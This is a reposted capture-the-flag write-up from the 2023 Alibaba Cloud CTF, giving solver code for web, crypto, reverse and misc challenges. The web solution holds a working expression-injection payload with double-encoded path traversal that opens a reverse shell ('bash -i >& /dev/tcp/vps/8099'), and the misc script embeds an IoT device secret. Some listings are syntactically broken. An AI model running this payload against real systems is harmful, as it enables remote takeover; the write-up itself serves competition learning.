2023阿里云CTF writeup by Mini-Venom
2023-4-26 11:25:38 Author: ChaMd5安全团队(查看原文) 阅读量:10 收藏

招新小广告CTF组诚招re、crypto、pwn、misc、合约方向的师傅,长期招新IOT+Car+工控+样本分析多个组招人有意向的师傅请联系邮箱

[email protected](带上简历和想加入的小组)

Web:

The path to shell

import requests as req
from urllib.parse import quote
import base64

# Target endpoint; %s is replaced with a path that walks back out of /app/user/.
url = "http://120.55.13.151:8080/app/user/%s"
# NOTE(review): as reproduced here the dict literal has no ':' between keys and
# values, so each entry is an adjacent-string concatenation, not a header pair.
headers = {
    "Accept""application/json, text/plain, */*",
    "Referer""http://120.55.13.151:8080/app/",
    "Connection""close"}

# Expression-language payload (OGNL-style syntax) that reaches java.lang.Runtime
# via reflection (forName / getDeclaredMethods / invoke) and runs a base64-wrapped
# shell command; "vps" in the /dev/tcp target is the author's placeholder host.
payload = '(#r="a".getClass().forName("java.lang.Runtime")).(#m=#r.getDeclaredMethods().{^ #this.name.equals("getRuntime")}[0]).(#o=#m.invoke(null,null)).(#e=#r.getDeclaredMethods().{? #this.name.equals("exec")}.{? #this.getParameters()[0].getType().getName().equals("[Ljava.lang.String;")}.{? #this.getParameters().length == 1}[0]).(#e.invoke(#o,new String[]{"sh","-c","echo %s |base64 -d|bash"}))' % base64.b64encode(b"bash -i >& /dev/tcp/vps/8099 0>&1")
# The expression is URL-encoded twice and '/' is additionally sent as %252F,
# presumably so the traversal (../../action/) survives whatever path
# normalization sits in front of the action dispatcher.
# Defender takeaway: decode the request path exactly once before routing, reject
# '..' segments after decoding, and never evaluate path segments as expressions.
# A request line containing %252F or the double-encoded "(#" (%2528%2523) is a
# cheap detection signature for this pattern.
payload = "../../action/%s" % quote(quote(payload))
resp = req.get(url % payload.replace("/","%252F"), headers=headers)

Crypto

HappyTree

// Solver contract for HappyTree: builds the leaf / proof / index arrays and hands
// them to the challenge contract's b(...) entry point.
// NOTE(review): `Greeter` is not declared in this listing; presumably an interface
// exposing b(bytes32[], bytes32[][], uint256[]) is defined alongside it.
contract exp {
    address public greeter;   // address of the deployed challenge contract
    constructor(address _greeter) public {
        greeter = _greeter;
    }

    // NOTE(review): `function go(public {` is malformed as reproduced here; the
    // intended signature is presumably `function go() public {`.
    function go(public {
        // Four leaves are submitted; a fifth candidate is left commented out.
        bytes32[] memory leafs;
        leafs = new bytes32[](4);

        leafs[0] = bytes32(0x81376b9868b292a46a1c486d344e427a3088657fda629b5f4a647822d329cd6a);
        leafs[1] = bytes32(0x28cac318a86c8a0a6a9156c2dba2c8c2363677ba0514ef616592d81557e679b6);
        leafs[2] = bytes32(0x804cd8981ad63027eb1d4a7e3ac449d0685f3660d6d8b1288eb12d345ca2331d);
        leafs[3] = bytes32(0x9b1a0a45cfdc60f45820808958c1895d44da61c8f804f5560020a373b23ad51e);
        // leafs[4] = bytes32(0x4a35f5bda2916fbfac6936f63313cee16979995b2409de59ceda0377bae8c486);

        // One sibling-hash proof per leaf; proofs[0..2] have two elements,
        // proofs[3] only one.
        bytes32[][] memory proofs;

        proofs = new bytes32[][](4);

        proofs[0] = new bytes32[](2);
        proofs[0][0] = bytes32(0x28cac318a86c8a0a6a9156c2dba2c8c2363677ba0514ef616592d81557e679b6);
        proofs[0][1] = bytes32(0x4a35f5bda2916fbfac6936f63313cee16979995b2409de59ceda0377bae8c486);

        proofs[1] = new bytes32[](2);
        proofs[1][0] = bytes32(0x81376b9868b292a46a1c486d344e427a3088657fda629b5f4a647822d329cd6a);
        proofs[1][1] = bytes32(0x4a35f5bda2916fbfac6936f63313cee16979995b2409de59ceda0377bae8c486);

        proofs[2] = new bytes32[](2);
        proofs[2][0] = bytes32(0x804cd8981ad63027eb1d4a7e3ac449d0685f3660d6d8b1288eb12d345ca2331d);
        proofs[2][1] = bytes32(0x9b1a0a45cfdc60f45820808958c1895d44da61c8f804f5560020a373b23ad51e);

        proofs[3] = new bytes32[](1);
        proofs[3][0] = bytes32(0x4a35f5bda2916fbfac6936f63313cee16979995b2409de59ceda0377bae8c486);

        // proofs[4] = new bytes32[](1);
        // proofs[4][0] = bytes32(0x9b1a0a45cfdc60f45820808958c1895d44da61c8f804f5560020a373b23ad51e);

        // index[i] = i for the first three leaves; leaf 3 is deliberately given
        // index 0 again. How the verifier interprets a repeated index cannot be
        // told from this listing — it depends on Greeter.b's implementation.
        uint256[] memory index;
        index = new uint256[](4);
        for (uint256 i=0;i<3;i++) {
            index[i] = i;
        }

        index[3] = 0;
        // index[4] = 1;

        Greeter(greeter).b(leafs, proofs, index);
    }
}

Reverse:

字节码跳动

#include <stdio.h>
#include <stdint.h>

/* 43 ciphertext bytes (presumably dumped from the challenge binary); decrypt()
 * treats bytes 0..18 and 19..42 with two different schemes. */
uint8_t enc[] = {
    0x3e, 0xdd, 0x79, 0x25, 0xcd, 0x6e, 0x04, 0xab,
    0x44, 0xf2, 0x5b, 0xef, 0x57, 0xbc, 0x53, 0xbd,
    0x20, 0xb7, 0x4b, 0x8c, 0x11, 0xf8, 0x93, 0x09,
    0x0f, 0xdc, 0xdf, 0xdd, 0xad, 0x07, 0x09, 0x10,
    0x01, 0x00, 0xfe, 0x6a, 0x92, 0x30, 0x33, 0x32,
    0x34, 0xfb, 0xae
};

void decrypt(uint8_t *enc, uint8_t *flag, int len) {
    // Initialize variables
    uint8_t r0 = enc[18];
    uint8_t r1 = 159;

    // Decrypt byte sequence
    for (int i = len - 1; i >= 0; i--) {
        if (i > 0 && i < 19) {
            flag[i] = (enc[i] - enc[i - 1] - 51) % 256;
        } else if (i == 0) {
            flag[i] = (enc[i] - 170 - 51) % 256;
        } else {
            r1 ^= enc[i];
            flag[i] = (enc[i] - r1) % 256;
        }
    }
}

/* Decode enc[] into a 43-byte buffer and print it as space-separated characters. */
int main(void) {
    enum { FLAG_LEN = 43 };
    uint8_t flag[FLAG_LEN] = {0};

    decrypt(enc, flag, FLAG_LEN);
    for (int i = 0; i < FLAG_LEN; i++)
        printf("%c ", flag[i]);
    putchar('\n');
    return 0;
}

Misc

消失的声波

#pip3 install aliyun-iot-linkkit 
import sys
from linkkit import linkkit
import threading
import traceback
import inspect
import time
import logging

# config log
# config log
# Root-logger line layout: timestamp, pid/tid, logger:module:function, level, message.
__log_format = '%(asctime)s-%(process)d-%(thread)d - %(name)s:%(module)s:%(funcName)s - %(levelname)s - %(message)s'
logging.basicConfig(format=__log_format)

# Device identity for the challenge's IoT instance (region, product key, device
# name and per-device secret).
# NOTE(review): device_secret is embedded in source. For anything beyond a
# throwaway CTF client it belongs in an environment variable or secret store,
# and a secret that has been published like this should be considered burned.
lk = linkkit.LinkKit(
    host_name="cn-shanghai",
    product_key="a1eAwsBKddO",
    device_name="ncApIY2XV9NUIY4VpbGk",
    device_secret="04845e512ead208b2437d970a154d69e")
# lk.config_mqtt(endpoint="iot-cn-6ja******.mqtt.iothub.aliyuncs.com")

# Verbose SDK logging; DEBUG output may include device identifiers, so review it
# before sharing logs.
lk.enable_logger(logging.DEBUG)

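def on_device_dynamic_register(rc, value, userdata):
    """Report the outcome of dynamic device registration.

    Args:
        rc: SDK result code; 0 means success, anything else is a failure.
        value: message text supplied by the SDK.
        userdata: opaque context passed through by the SDK; unused here.
    """
    # %-formatting instead of '+' so a non-str value (bytes, None) is printed
    # rather than raising TypeError inside an SDK callback.
    if rc == 0:
        print("dynamic register device success, value:%s" % (value,))
    else:
        print("dynamic register device fail, message:%s" % (value,))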

def on_connect(session_flag, rc, userdata):
    """Log the MQTT connect result: the session flag and the return code."""
    line = "on_connect:%d,rc:%d" % (session_flag, rc)
    print(line)

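def on_disconnect(rc, userdata):
    """Log an MQTT disconnect with its return code and the SDK userdata.

    The original message ended with a dangling "userdata:" label and never
    printed the value; it is now substituted.
    """
    print("on_disconnect:rc:%d,userdata:%s" % (rc, userdata))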

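def on_topic_message(topic, payload, qos, userdata):
    """Log an inbound MQTT message: topic, raw payload and QoS.

    Uses %-formatting throughout so a bytes topic (or any non-str value) is
    rendered instead of raising TypeError on string concatenation.
    """
    print("on_topic_message:%s payload:%s qos:%s" % (topic, payload, qos))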

def on_subscribe_topic(mid, granted_qos, userdata):
    """Log a subscribe acknowledgement with the QoS granted for each topic."""
    granted = ",".join("%s" % level for level in granted_qos)
    print("on_subscribe_topic mid:%d, granted_qos:%s" % (mid, granted))

def on_unsubscribe_topic(mid, userdata):
    """Log an unsubscribe acknowledgement by message id."""
    text = "on_unsubscribe_topic mid:%d" % mid
    print(text)

def on_publish_topic(mid, userdata):
    """Log a publish acknowledgement by message id."""
    text = "on_publish_topic mid:%d" % mid
    print(text)

# Wire the logging callbacks above into the SDK client; each is invoked by the
# SDK's worker loop, so they should stay cheap and must not raise.
lk.on_device_dynamic_register = on_device_dynamic_register
lk.on_connect = on_connect
lk.on_disconnect = on_disconnect
lk.on_topic_message = on_topic_message
lk.on_subscribe_topic = on_subscribe_topic
lk.on_unsubscribe_topic = on_unsubscribe_topic
lk.on_publish_topic = on_publish_topic

# Device-info string handed to the SDK (format is SDK-defined; not documented here).
lk.config_device_info("Eth|03ACDEFF0032|Eth|03ACDEFF0031")
# NOTE(review): port=1883 is the conventional plaintext MQTT port while
# secure="TLS" asks for TLS; whether the SDK honours the port or overrides it
# for TLS cannot be told from this script — confirm the session is actually
# encrypted (8883 is the usual TLS port) before relying on it.
lk.config_mqtt(port=1883, protocol="MQTTv311", transport="TCP",secure="TLS")
# Non-blocking connect; the worker thread drives the MQTT loop and callbacks.
lk.connect_async()
lk.start_worker_loop()

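# Interactive control loop: each line read from stdin selects an action.
#   1 disconnect, 2 reconnect, 3 subscribe user/get, 4 unsubscribe user/get,
#   5 publish a LightSwitch=0 property update, 8 dump subscribed topics,
#   9 destruct the client; any other input (or Ctrl-C / EOF) exits.
while True:
    try:
        msg = input()
    except (KeyboardInterrupt, EOFError):
        # EOFError covers a closed/redirected stdin, which previously escaped
        # as an uncaught traceback.
        sys.exit()
    else:
        if msg == "1":
            lk.disconnect()
        elif msg == "2":
            lk.connect_async()
        elif msg == "3":
            rc, mid = lk.subscribe_topic(lk.to_full_topic("user/get"))
            if rc == 0:
                print("subscribe topic success:%r, mid:%r" % (rc, mid))
            else:
                print("subscribe topic fail:%d" % rc)
        elif msg == "4":
            rc, mid = lk.unsubscribe_topic(lk.to_full_topic("user/get"))
            if rc == 0:
                print("unsubscribe topic success:%r, mid:%r" % (rc, mid))
            else:
                print("unsubscribe topic fail:%d" % rc)
        elif msg == "5":
            rc, mid = lk.publish_topic(lk.to_full_topic("user/update"), "{\"id\":\"1\",\"version\":\"1.0\",\"params\":{\"LightSwitch\":0}}")
            if rc == 0:
                print("publish topic success:%r, mid:%r" % (rc, mid))
            else:
                print("publish topic fail:%d" % rc)
        elif msg == "8":
            ret = lk.dump_user_topics()
            # The original passed two arguments to print(), which emitted a
            # literal "%s" followed by the dump instead of substituting it.
            print("user topics:%s" % str(ret))
        elif msg == "9":
            lk.destruct()
            print("destructed")
        else:
            sys.exit()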

- END -


文章来源: http://mp.weixin.qq.com/s?__biz=MzIzMTc1MjExOQ==&mid=2247508613&idx=1&sn=d00c4d23ff20301ef9f85b22e38129c2&chksm=e89d8a5ddfea034bba7abe8a0cc5b998e517e8edb54177fd537458446773fc464c1129fc34d1#rd
如有侵权请联系:admin#unsafe.sh